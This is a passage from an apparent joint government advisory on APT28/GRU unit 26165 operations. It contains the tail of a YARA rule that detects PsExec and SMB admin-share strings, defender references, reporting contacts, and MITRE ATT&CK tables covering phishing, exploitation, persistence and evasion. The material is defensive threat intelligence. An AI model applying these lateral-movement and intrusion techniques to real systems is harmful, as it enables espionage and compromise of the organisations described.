<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $sysinternals_1 = "SYSINTERNALS SOFTWARE LICENCE TERMS"</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $sysinternals_2 = "/accepteula"</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $sysinternals_3 = "SoftwareSysinternals"</code></p>
<br />
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $network_1 = "\%sIPC$"</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $network_2 = "\%sADMIN$%s"</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $network_3 = "DeviceLanmanRedirector%sipc$"</code></p>
<br />
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $psexec_1 = "PSEXESVC"</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $psexec_2 = "PSEXEC-{}-"</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $psexec_3 = "Copying %s to %s..."</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $psexec_4 = "gPSINFSVC"</code></p>
<br />
<br />
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; condition:</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ( uint16( 0x0 ) ==0x5a4d )</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; and</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ( uint16( uint32( 0x3c )) == 0x4550 )</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; and&nbsp;</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; filesize &lt; 1024KB</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; and</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; (</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ( any of ($sysinternals_*) and any of ($psexec_*) )</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; or</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ( 2 of ($network_*) and 2 of ($psexec_*))</code></p>
<p><code>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; )</code></p>
<p><code>}</code></p>
</div>
<h2><a class="ck-anchor" id="CybersecurityIndustryTracking"><strong>Cybersecurity Industry Tracking&nbsp;</strong></a></h2>
<p>The cybersecurity industry provides overlapping cyber threat intelligence, IOCs, and mitigation recommendations related to GRU unit 26165 cyber actors. While not all encompassing, the following are the most notable threat group names related under <a href="https://attack.mitre.org/groups/G0007" target="_blank" title="MITRE ATT&amp;CK G0007">MITRE ATT&amp;CK G0007</a> and commonly used within the cybersecurity community:&nbsp;</p>
<ul>
<li>APT28 [<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#cited14" title="14">14</a>]</li>
<li>Fancy Bear [<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#cited14" title="14">14</a>]</li>
<li>Forest Blizzard [<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#cited14" title="14">14</a>]</li>
<li>Blue Delta [<a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-141a#cited15" title="15">15</a>]</li>
</ul>
<p>Note: Cybersecurity companies have different methods of tracking and attributing cyber actors, and this may not be a 1:1 correlation to the U.S. government’s understanding for all activity related to these groupings.</p>
<h2><strong>Further Reference</strong></h2>
<p>To search for the presence of malicious email messages targeting CVE-2023-23397, network defenders may consider using the script published by Microsoft:&nbsp;<a href="https://aka.ms/CVE-2023-23397ScriptDoc" target="_blank" title="Content Injection">https://aka.ms/CVE-2023-23397ScriptDoc</a>.&nbsp;</p>
<p>For the Impacket TTP, network defenders may consider using the following publicly available Impacket YARA detection rule:<br /><a href="https://github.com/Neo23x0/signature-base/blob/master/yara/gen_impacket_tools.yar" target="_blank" title="Access Mediation">https://github.com/Neo23x0/signature-base/blob/master/yara/gen_impacket_tools.yar</a></p>
<h2><strong>Works Cited</strong></h2>
<p>[<a class="ck-anchor" id="cited1">1</a>]&nbsp;Microsoft. Defending Ukraine: Early Lessons from the Cyber War. 2022. <a href="https://blogs.microsoft.com/on-the-issues/2022/06/22/defending-ukraine-early-lessons-from-the-cyber-war/" target="_blank" title="Defending Ukraine: Early Lessons from the Cyber War">https://blogs.microsoft.com/on-the-issues/2022/06/22/defending-ukraine-early-lessons-from-the-cyber-war/</a> &nbsp;<br />[<a class="ck-anchor" id="cited2">2</a>]&nbsp;FBI et al. Russian Cyber Actors Use Compromised Routers to Facilitate Cyber Operations. 2024. <a href="https://media.defense.gov/2024/Feb/27/2003400753/-1/-1/0/CSA-Russian-Actors-Use-Routers-Facilitate-Cyber_Operations.PDF" target="_blank" title="Russian Cyber Actors Use Compromised Routers to Facilitate Cyber Operations">https://media.defense.gov/2024/Feb/27/2003400753/-1/-1/0/CSA-Russian-Actors-Use-Routers-Facilitate-Cyber_Operations.PDF</a> &nbsp;&nbsp;<br />[<a class="ck-anchor" id="cited3">3</a>] NSA et al. Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. 2021. <a href="https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/0/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF" target="_blank" title="Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments">https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/0/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF</a>&nbsp;<br />[<a class="ck-anchor" id="cited4">4</a>]&nbsp;ANSSI. Campagnes d&#8217;attaques du mode opératoire APT28 depuis 2021. 2023. <a href="https://cert.ssi.gouv.fr/cti/CERTFR-2023-CTI-009/" target="_blank" title="Campagnes d'attaques du mode opératoire APT28 depuis 2021">https://cert.ssi.gouv.fr/cti/CERTFR-2023-CTI-009/</a> &nbsp;<br />[<a class="ck-anchor" id="cited5">5</a>]&nbsp;ANSSI. Targeting and compromise of french entities using the APT28 intrusion set. 2025. <a href="https://cert.ssi.gouv.fr/cti/CERTFR-2025-CTI-007/" target="_blank" title="Targeting and compromise of french entities using the APT28 intrusion set">https://cert.ssi.gouv.fr/cti/CERTFR-2025-CTI-007/</a> &nbsp;&nbsp;<br />[<a class="ck-anchor" id="cited6">6</a>]&nbsp;Polish Cyber Command. Detecting Malicious Activity Against Microsoft Exchange Servers. 2023. <a href="https://www.wojsko-polskie.pl/woc/articles/aktualnosci-w/detecting-malicious-activity-against-microsoft-exchange-servers/" target="_blank" title="Detecting Malicious Activity Against Microsoft Exchange Servers">https://www.wojsko-polskie.pl/woc/articles/aktualnosci-w/detecting-malicious-activity-against-microsoft-exchange-servers/</a>&nbsp;<br />[<a class="ck-anchor" id="cited7">7</a>]&nbsp;IBM. Israel-Hamas Conflict Lures to Deliver Headlace Malware. 2023. <a href="https://securityintelligence.com/x-force/itg05-ops-leverage-israel-hamas-conflict-lures-to-deliver-headlace-malware/" target="_blank" title="Israel-Hamas Conflict Lures to Deliver Headlace Malware">https://securityintelligence.com/x-force/itg05-ops-leverage-israel-hamas-conflict-lures-to-deliver-headlace-malware/</a>&nbsp;<br />[<a class="ck-anchor" id="cited8">8</a>]&nbsp;CERT-UA. APT28: From Initial Attack to Creating Domain Controller Threats in an Hour. 2023. <a href="https://cert.gov.ua/article/6276894" target="_blank" title="APT28: From Initial Attack to Creating Domain Controller Threats in an Hour">https://cert.gov.ua/article/6276894</a>&nbsp;<br />[<a class="ck-anchor" id="cited9">9</a>]&nbsp;NSA. Embracing a Zero Trust Security Model. 2021. <a href="https://media.defense.gov/2021/Feb/25/2002588479/-1/-1/0/CSI_EMBRACING_ZT_SECURITY_MODEL_UOO115131-21.PDF" target="_blank" title="Embracing a Zero Trust Security Model">https://media.defense.gov/2021/Feb/25/2002588479/-1/-1/0/CSI_EMBRACING_ZT_SECURITY_MODEL_UOO115131-21.PDF</a> &nbsp;<br />[<a class="ck-anchor" id="cited10">10</a>]&nbsp;NSA et al. Keeping PowerShell: Security Measures to Use and Embrace. 2022. <a href="https://media.defense.gov/2022/Jun/22/2003021689/-1/-1/0/CSI_KEEPING_POWERSHELL_SECURITY_MEASURES_TO_USE_AND_EMBRACE_20220622.PDF" target="_blank" title="Keeping PowerShell: Security Measures to Use and Embrace">https://media.defense.gov/2022/Jun/22/2003021689/-1/-1/0/CSI_KEEPING_POWERSHELL_SECURITY_MEASURES_TO_USE_AND_EMBRACE_20220622.PDF</a>&nbsp;<br />[<a class="ck-anchor" id="cited11">11</a>]&nbsp;National Institute of Standards and Technology (NIST). Special Publication 800-63B: Digital Identity Guidelines – Authentication and Lifecycle Management. 2020. <a href="https://pages.nist.gov/800-63-3/sp800-63b.html" target="_blank" title="Special Publication 800-63B: Digital Identity Guidelines – Authentication and Lifecycle Management">https://pages.nist.gov/800-63-3/sp800-63b.html</a>&nbsp;<br />[<a class="ck-anchor" id="cited12">12</a>]&nbsp;NSA. Selecting Secure Multi-factor Authentication Solutions. October 16, 2020. <a href="https://media.defense.gov/2024/Jul/31/2003515137/-1/-1/0/MULTIFACTOR_AUTHENTICATION_SOLUTIONS_UOO17091520.PDF" target="_blank" title="Selecting Secure Multi-factor Authentication Solutions">https://media.defense.gov/2024/Jul/31/2003515137/-1/-1/0/MULTIFACTOR_AUTHENTICATION_SOLUTIONS_UOO17091520.PDF</a> &nbsp;<br />[<a class="ck-anchor" id="cited13">13</a>]&nbsp;NSA and CSA. NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations. 2023. <a href="https://media.defense.gov/2023/Oct/05/2003314578/-1/-1/0/JOINT_CSA_TOP_TEN_MISCONFIGURATIONS_TLP-CLEAR.PDF" target="_blank" title="NSA and CISA Red and Blue Teams Share Top Ten Cybersecurity Misconfigurations">https://media.defense.gov/2023/Oct/05/2003314578/-1/-1/0/JOINT_CSA_TOP_TEN_MISCONFIGURATIONS_TLP-CLEAR.PDF</a>&nbsp;</p>
<p>[<a class="ck-anchor" id="cited14">14</a>]&nbsp;Department of Justice. Justice Department Conducts Court-Authorized Disruption of Botnet Controlled by the Russian Federation’s Main Intelligence Directorate of the General Staff (GRU). 2024. <a href="https://www.justice.gov/archives/opa/pr/justice-department-conducts-court-authorized-disruption-botnet-controlled-russian" target="_blank" title="Justice Department Conducts Court-Authorized Disruption of Botnet Controlled by the Russian Federation’s Main Intelligence Directorate of the General Staff (GRU). 2024">https://www.justice.gov/archives/opa/pr/justice-department-conducts-court-authorized-disruption-botnet-controlled-russian</a> &nbsp;<br />[<a class="ck-anchor" id="cited15">15</a>]&nbsp;Recorded Future. GRU’s BlueDelta Targets Key Networks in Europe with Multi-Phase Espionage Campaigns. 2024. <a href="https://go.recordedfuture.com/hubfs/reports/CTA-RU-2024-0530.pdf" target="_blank" title="GRU’s BlueDelta Targets Key Networks in Europe with Multi-Phase Espionage Campaigns">https://go.recordedfuture.com/hubfs/reports/CTA-RU-2024-0530.pdf</a> &nbsp;<br />&nbsp;</p>
<h2><strong>Disclaimer of endorsement</strong></h2>
<p>The information and opinions contained in this document are provided &#8220;as is&#8221; and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.</p>
<h2><strong>Purpose</strong></h2>
<p>This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate threats and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.</p>
<h2><strong>Contact</strong></h2>
<p><strong>United States organizations</strong></p>
<ul>
<li><strong>National Security Agency (NSA)</strong>
<ul>
<li>Cybersecurity Report Feedback:&nbsp;<a href="mailto:CybersecurityReports@nsa.gov" target="_blank" title="mailto:CybersecurityReports@nsa.gov">CybersecurityReports@nsa.gov</a></li>
<li>Defense Industrial Base Inquiries and Cybersecurity Services:&nbsp;<a href="mailto:DIB_Defense@cyber.nsa.gov" target="_blank" title="mailto:DIB_Defense@cyber.nsa.gov">DIB_Defense@cyber.nsa.gov</a></li>
<li>Media Inquiries / Press Desk: NSA Media Relations: 443-634-0721,&nbsp;<a href="mailto:MediaRelations@nsa.gov" target="_blank" title="mailto:MediaRelations@nsa.gov">MediaRelations@nsa.gov</a></li>
</ul>
</li>
<li><strong>Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI)</strong>
<ul>
<li>U.S. organizations are encouraged to reporting suspicious or criminal activity related to information in this advisory to CISA via the agency’s&nbsp;<a href="https://myservices.cisa.gov/irf" target="_blank" title="Incident Reporting System">Incident Reporting System</a>, its 24/7 Operations Center (<a href="mailto:report@cisa.gov" target="_blank" title="mailto:report@cisa.gov">report@cisa.gov</a> or 888-282-0870), or your&nbsp;<a href="https://www.fbi.gov/contact-us/field-offices" target="_blank" title="local FBI field office">local FBI field office</a>. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment user for the activity; the name of the submitting company or organization; and a designated point of contact.</li>
</ul>
</li>
<li><strong>Department of Defense Cyber Crime Center (DC3)</strong>
<ul>
<li>Defense Industrial Base Inquiries and Cybersecurity Services:&nbsp;<a href="mailto:DC3.DCISE@us.af.mil" target="_blank" title="mailto:DC3.DCISE@us.af.mil">DC3.DCISE@us.af.mil</a></li>
<li>Media Inquiries / Press Desk:&nbsp;<a href="mailto:DC3.Information@us.af.mil" target="_blank" title="DC3.Information@us.af.mil">DC3.Information@us.af.mil</a></li>
</ul>
</li>
</ul>
<p><strong>United Kingdom organizations</strong></p>
<ul>
<li>Report significant cyber security incidents to&nbsp;<a href="https://ncsc.gov.uk/report-an-incident" target="_blank" title="ncsc.gov.uk/report-an-incident">ncsc.gov.uk/report-an-incident</a> (monitored 24/7)</li>
</ul>
<p><strong>Germany organizations</strong></p>
<ul>
<li>Bundesnachrichtendienst (BND): Media Relations / Press Desk: +49 30 20 45 36 30,&nbsp;<a href="mailto:pressestelle@bnd.bund.de" target="_blank" title="pressestelle@bnd.bund.de">pressestelle@bnd.bund.de</a></li>
<li>BfV Prevention/Economic Protection Unit: +49 30 18792-3322,&nbsp;<a href="mailto:wirtschaftsschutz@bfv.bund.de" target="_blank" title="wirtschaftsschutz@bfv.bund.de">wirtschaftsschutz@bfv.bund.de</a></li>
<li>BSI Service-Center: +49 800 274 1000,&nbsp;<a href="mailto:service-center@bsi.bund.de" target="_blank" title="&nbsp;service-center@bsi.bund.de">service-center@bsi.bund.de</a></li>
</ul>
<p><strong>Czech Republic organizations</strong></p>
<ul>
<li>Security Information Service (BIS):&nbsp;<a href="mailto:cyber.threats@bis.cz" target="_blank" title="&nbsp;cyber.threats@bis.cz">cyber.threats@bis.cz</a></li>
<li>National Cyber and Information Security Agency (NÚKIB):&nbsp;<a href="mailto:cert.incident@nukib.gov.cz" target="_blank" title="mailto:cert.incident@nukib.gov.cz">cert.incident@nukib.gov.cz</a>&nbsp;</li>
</ul>
<p><strong>Poland organizations</strong></p>
<ul>
<li>Poland Military Counterintelligence Service (SKW):&nbsp;<a href="mailto:cyber.int@skw.gov.pl" target="_blank" title="mailto:cyber.int@skw.gov.pl">cyber.int@skw.gov.pl</a></li>
</ul>
<p><strong>Australian organizations</strong></p>
<ul>
<li>Visit <a href="https://www.cyber.gov.au/" target="_blank" title="https://www.cyber.gov.au/">cyber.gov.au</a> or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories.</li>
</ul>
<p><strong>Canadian organizations</strong></p>
<ul>
<li>Report incidents by emailing CCCS at&nbsp;<a href="mailto:contact@cyber.gc.ca" target="_blank" title="contact@cyber.gc.ca">contact@cyber.gc.ca</a>.</li>
</ul>
<p><strong>Estonia organizations</strong></p>
<ul>
<li>Estonian Foreign Intelligence Service (EFIS):&nbsp;<a href="mailto:info@valisluureamet.ee" target="_blank" title="info@valisluureamet.ee">info@valisluureamet.ee</a></li>
<li>Estonian National Cyber Security Centre (NCSC-EE):&nbsp;<a href="mailto:ria@ria.ee" target="_blank" title="&nbsp;ria@ria.ee">ria@ria.ee</a></li>
</ul>
<p><strong>French organizations</strong></p>
<ul>
<li>French organizations are encouraged to report suspicious activity or incident related to information found in this advisory by contacting ANSSI/CERT-FR by email at&nbsp;<a href="mailto:cert-fr@ssi.gouv.fr" target="_blank" title="cert-fr@ssi.gouv.fr">cert-fr@ssi.gouv.fr</a> or by phone at: 3218 or +33 9 70 83 32 18.&nbsp;</li>
</ul>
<h2><a class="ck-anchor" id="appendixa"><strong>Appendix A: MITRE ATT&amp;CK tactics and techniques</strong></a></h2>
<p>See <strong>Table 2</strong> through <strong>Table 14</strong> for all the threat actor tactics and techniques referenced in this advisory.</p>
<table class="tablesaw tablesaw-stack">
<caption>Table 2: Reconnaissance</caption>
<thead>
<tr>
<th role="columnheader"><strong>Tactic/Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Reconnaissance</td>
<td><a href="https://attack.mitre.org/versions/v17/tactics/TA0043/" target="_blank" title="TA0043">TA0043</a></td>
<td>Conducted reconnaissance on at least one entity involved in the production of ICS components for railway management.</td>
</tr>
<tr>
<td>Gather Victim Identity Information: Email Addresses</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1589/002/" target="_blank" title="T1589.002">T1589.002</a></td>
<td>Conducted contact information reconnaissance to identify additional targets in key positions.</td>
</tr>
<tr>
<td>Gather Victim Org Information</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1591/" target="_blank" title="T1591">T1591</a></td>
<td>Conducted reconnaissance of the cybersecurity department.</td>
</tr>
<tr>
<td>Gather Victim Org Information: Identify Roles</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1591/004/" target="_blank" title="T1591.004">T1591.004</a></td>
<td>Conducted reconnaissance of individuals responsible for coordinating transport.</td>
</tr>
<tr>
<td>Gather Victim Org Information: Business Relationships</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1591/002/" target="_blank" title="T1591.002">T1591.002</a></td>
<td>Conducted reconnaissance of other companies cooperating with the victim entity.</td>
</tr>
<tr>
<td>Gather Victim Host Information</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1592/" target="_blank" title="T1592">T1592</a></td>
<td>Attempted to enumerate Real Time Streaming Protocol (RTSP) servers hosting IP cameras.</td>
</tr>
</tbody>
</table>
<br />
<table class="tablesaw tablesaw-stack">
<caption>Table 3: Resource development</caption>
<thead>
<tr>
<th role="columnheader"><strong>Tactic/Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Compromise Accounts: Email Accounts</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1586/002/" target="_blank" title="T1586.002">T1586.002</a></td>
<td>Sent phishing emails using compromised accounts.</td>
</tr>
<tr>
<td>Compromise Accounts: Cloud Accounts</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1586/003/" target="_blank" title="T1586.003">T1586.003</a></td>
<td>Sent phishing emails using compromised accounts.</td>
</tr>
</tbody>
</table>
<br />
<table class="tablesaw tablesaw-stack">
<caption>Table 4: Initial Access</caption>
<thead>
<tr>
<th role="columnheader"><strong>Tactic/Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Trusted Relationship</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1199/" target="_blank" title="T1199">T1199</a></td>
<td>Conducted follow-on targeting of additional entities in the transportation sector that had business ties to the primary target, exploiting trust relationships to attempt to gain additional access.</td>
</tr>
<tr>
<td>Phishing</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1566/" target="_blank" title="T1566">T1566</a></td>
<td>Used spearphishing for credentials and delivering malware to gain initial access to targeted entities.</td>
</tr>
<tr>
<td>Phishing: Spearphishing Attachment</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1566/001/" target="_blank" title="T1566.001">T1566.001</a></td>
<td>Sent emails with malicious attachments.</td>
</tr>
<tr>
<td>Phishing: Spearphishing Link</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1566/002/" target="_blank" title="T1566.002">T1566.002</a></td>
<td>Used spearphishing with included links to fake login pages. Sent emails with embedded hyperlinks that downloaded a malicious archive.</td>
</tr>
<tr>
<td>Phishing: Spearphishing Voice</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1566/004/" target="_blank" title="T1566.004">T1566.004</a></td>
<td>Attempted to use voice phishing to gain access to privileged accounts by impersonating IT staff.</td>
</tr>
<tr>
<td>External Remote Services</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1133/" target="_blank" title="T1133">T1133</a></td>
<td>Exploited Internet-facing infrastructure, including corporate VPNs, to gain initial access to targeted entities.</td>
</tr>
<tr>
<td>Exploit Public-Facing Application</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1190/" target="_blank" title="T1190">T1190</a></td>
<td>Exploited public vulnerabilities and SQL injection to gain initial access to targeted entities.</td>
</tr>
<tr>
<td>Content Injection</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1659/" target="_blank" title="T1659">T1659</a></td>
<td>Leveraged a WinRAR vulnerability allowing for the execution of arbitrary code embedded in an archive.</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption>Table 5: Execution</caption>
<thead>
<tr>
<th role="columnheader"><strong>Tactic/Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>User Execution: Malicious Link</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1204/001/" target="_blank" title="T1204.001">T1204.001</a></td>
<td>Used malicious links to hosted shortcuts in spearphishing.</td>
</tr>
<tr>
<td>User Execution: Malicious File</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1204/002/" target="_blank" title="T1204.002">T1204.002</a></td>
<td>Delivered malware executables via spearphishing.</td>
</tr>
<tr>
<td>Scheduled Task/Job: Scheduled Task</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1053/005/" target="_blank" title="T1053.005">T1053.005</a></td>
<td>Used scheduled tasks to establish persistence.</td>
</tr>
<tr>
<td>Command and Scripting Interpreter</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1059/" target="_blank" title="T1059">T1059</a></td>
<td>Delivered scripts in spearphishing. Executed arbitrary shell commands.</td>
</tr>
<tr>
<td>Command and Scripting Interpreter: PowerShell</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1059/001/" target="_blank" title="T1059.001">T1059.001</a></td>
<td>PowerShell commands were often used to prepare data for exfiltration.</td>
</tr>
<tr>
<td>Command and Scripting Interpreter: Windows Command Shell</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1059/003/" target="_blank" title="T1059.003">T1059.003</a></td>
<td>Used BAT script in spearphishing.</td>
</tr>
<tr>
<td>Command and Scripting Interpreter: Visual Basic</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1059/005/" target="_blank" title="T1059.005">T1059.005</a></td>
<td>Used VBScript in spearphishing.</td>
</tr>
<tr>
<td>Command and Scripting Interpreter: Python</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1059/006/" target="_blank" title="T1059.006">T1059.006</a></td>
<td>Installed python on infected machines to enable the execution of Certipy.</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption>Table 6: Persistence</caption>
<thead>
<tr>
<th role="columnheader"><strong>Tactic/Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Account Manipulation:&nbsp;<br />Additional Email Delegate&nbsp;<br />Permissions</td>
<td>
<div class="TableCellContent SCXW32471306 BCX8">
<div class="OutlineElement Ltr SCXW32471306 BCX8">
<p><a href="https://attack.mitre.org/versions/v17/techniques/T1098/002/" target="_blank" title="T1098.002&nbsp;"><u>T1098.002</u></a>&nbsp;</p>
</div>
</div>
</td>
<td>Used manipulation of mailbox permissions to establish sustained email collection.&nbsp;</td>
</tr>
<tr>
<td>Modify Authentication Process:&nbsp;<br />Multi-Factor Authentication</td>
<td>
<div class="TableCellContent SCXW32471306 BCX8">
<div class="OutlineElement Ltr SCXW32471306 BCX8">
<p><a href="https://attack.mitre.org/versions/v17/techniques/T1556/006/" target="_blank" title="T1556.006&nbsp;"><u>T1556.006</u></a>&nbsp;</p>
</div>
</div>
</td>
<td>Enrolled compromised accounts in MFA mechanisms to increase the trust-level of compromised accounts and enable sustained access.&nbsp;</td>
</tr>
<tr>
<td>Hijack Execution Flow: DLL&nbsp;<br />Search Order Hijacking&nbsp;</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1574/001/" target="_blank" title="T1574.001">T1574.001</a>&nbsp;</td>
<td>Used DLL search order hijacking to facilitate malware execution.&nbsp;</td>
</tr>
<tr>
<td>Boot or Logon Autostart&nbsp;<br />Execution: Registry Run Keys /&nbsp;<br />Startup Folder</td>
<td>
<br />
<p><a href="https://attack.mitre.org/versions/v17/techniques/T1547/001/" target="_blank" title="T1547.001 ">T1547.001&nbsp;</a></p>
</td>
<td>Used run keys to establish persistence.&nbsp;</td>
</tr>
<tr>
<td>Boot or Logon Autostart&nbsp;<br />Execution: Shortcut&nbsp;<br />Modification</td>
<td>
<p><a href="https://attack.mitre.org/versions/v17/techniques/T1547/009/" target="_blank" title="T1547.009">T1547.009</a>&nbsp;</p>
<br />
</td>
<td>Placed malicious shortcuts in the startup folder to establish persistence.&nbsp;</td>
</tr>
</tbody>
</table>
<table class="tablesaw tablesaw-stack">
<caption>Table 7: Defense Evasion</caption>
<thead>
<tr>
<th role="columnheader"><strong>Tactic/Technique Title</strong></th>
<th role="columnheader"><strong>ID</strong></th>
<th role="columnheader"><strong>Use</strong></th>
</tr>
</thead>
<tbody>
<tr>
<td>Indicator Removal: Clear&nbsp;<br />Windows Event Logs</td>
<td><a href="https://attack.mitre.org/versions/v17/techniques/T1070/001/" target="_blank" title="T1070.001">T1070.001</a>&nbsp;</td>
